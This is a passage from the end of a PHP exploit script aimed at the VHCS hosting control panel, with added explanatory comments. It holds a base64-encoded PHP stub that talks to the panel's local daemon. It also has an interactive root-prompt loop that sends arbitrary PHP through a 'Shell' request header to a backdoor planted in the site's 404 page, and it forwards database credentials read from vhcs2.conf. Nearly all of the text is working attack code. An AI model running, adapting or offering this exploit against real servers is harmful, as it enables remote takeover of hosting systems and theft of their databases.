.'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG'
.'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj'
.'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC'
.'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv'
.'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC'
.'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg'
.'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm'
.'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl'
.'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC'
.'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9'
.'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC'
.'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk'
.'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw'
.'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy'
.'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy'
.'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM'
.'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW'
.'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v'
.'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW'
.'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk'
.'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi'
.'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg'
.'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW'
.'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0'
.'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS'
.'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy'
.'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj'
.'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz'
.'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS'
.'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy'
.'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH'
.'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK'
.'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn'
.'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg'
.'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW'
.'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy'
.'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX'
.'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf'
.'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG'
.'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK'
.'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew'
.'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg'
.'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX'
.'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog'
.'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC'
.'RsaW5lOw0KfQo/Pgo=';
while($this->cmd_prompt())
{
# Temp file path: <remote DOCUMENT_ROOT>/<md5 of a random number>.
$this->exec_php('print $_SERVER["DOCUMENT_ROOT"];');
$this->tmp_file = $this->getcontent().'/'.md5(rand());
# Values come from the parsed vhcs2.conf (keys upper-cased in
# get_vhcs_conf()).
$this->set_hvar('db-host', $this->conf['DATABASE_HOST']);
$this->set_hvar('db-user', $this->conf['DATABASE_USER']);
$this->set_hvar('db-pass', $this->conf['DATABASE_PASSWORD']);
$this->set_hvar('db-name', $this->conf['DATABASE_NAME']);
$this->set_hvar('sleep-time', $this->sleep_time);
$this->set_hvar('file', $this->tmp_file);
$this->set_hvar('cmd', $this->cmd);
# 'Version' never matches the upper-cased keys, so this header is sent
# with an empty (null) value.
$this->set_hvar('version', $this->conf['Version']);
$this->set_hvar('php-keys', '?>'.$this->php_keys_code);
$this->exec_php('?>'.base64_decode($this->woot_code));
print "\n".$this->getcontent();
}
exit(0);
}
# Adds a request header "Sploit-<name>" whose value is base64($value).
# The headers accumulate on the base-class request object (behaviour of
# addheader() assumed, not visible here).
function set_hvar($name, $value)
{
$this->addheader('Sploit-'.$name, base64_encode($value));
return;
}
# Prints the prompt, reads one line from stdin into $this->cmd and returns
# FALSE when it is exactly "quit" or "exit", TRUE otherwise.
function cmd_prompt()
{
$this->msg('root@'.$this->usr.': ', 1);
$this->cmd = trim(fgets(STDIN));
if(!ereg('^(quit|exit)$', $this->cmd))
return TRUE;
else
return FALSE;
}
# Sends $php to the stub planted by write_code(): the code travels base64
# encoded in a 'Shell' request header to the domain's 404 page. The reply
# is read afterwards with getcontent(). This header is the request-side
# indicator of the backdoor.
function exec_php($php)
{
$this->addheader('Shell', base64_encode($php));
$this->get($this->dmn_url.'/errors/404/index.php');
return;
}
# Prints " <flag glyph> <msg>" on a new line. $action 1 prints a newline
# and hands over to usage() (exit 1); $action 2 exits with status 1. Any
# other value (0, and the -2 used in path_content()) does nothing further
# and the method returns null. The break statements after return/exit are
# unreachable.
function msg($msg, $flag, $action=0)
{
print "\n ".$this->flags[$flag]."\x20".$msg;
switch($action)
{
case 1:
print "\n";
return $this->usage();
break;
case 2:
print "\n";
exit(1);
break;
}
}
}
# Script entry: main() never returns on a successful run (exec_cmd() ends
# with exit(0)) and argument or login errors leave through usage() (exit 1).
$spl = new vhcs_xpl;
$spl->main();
?>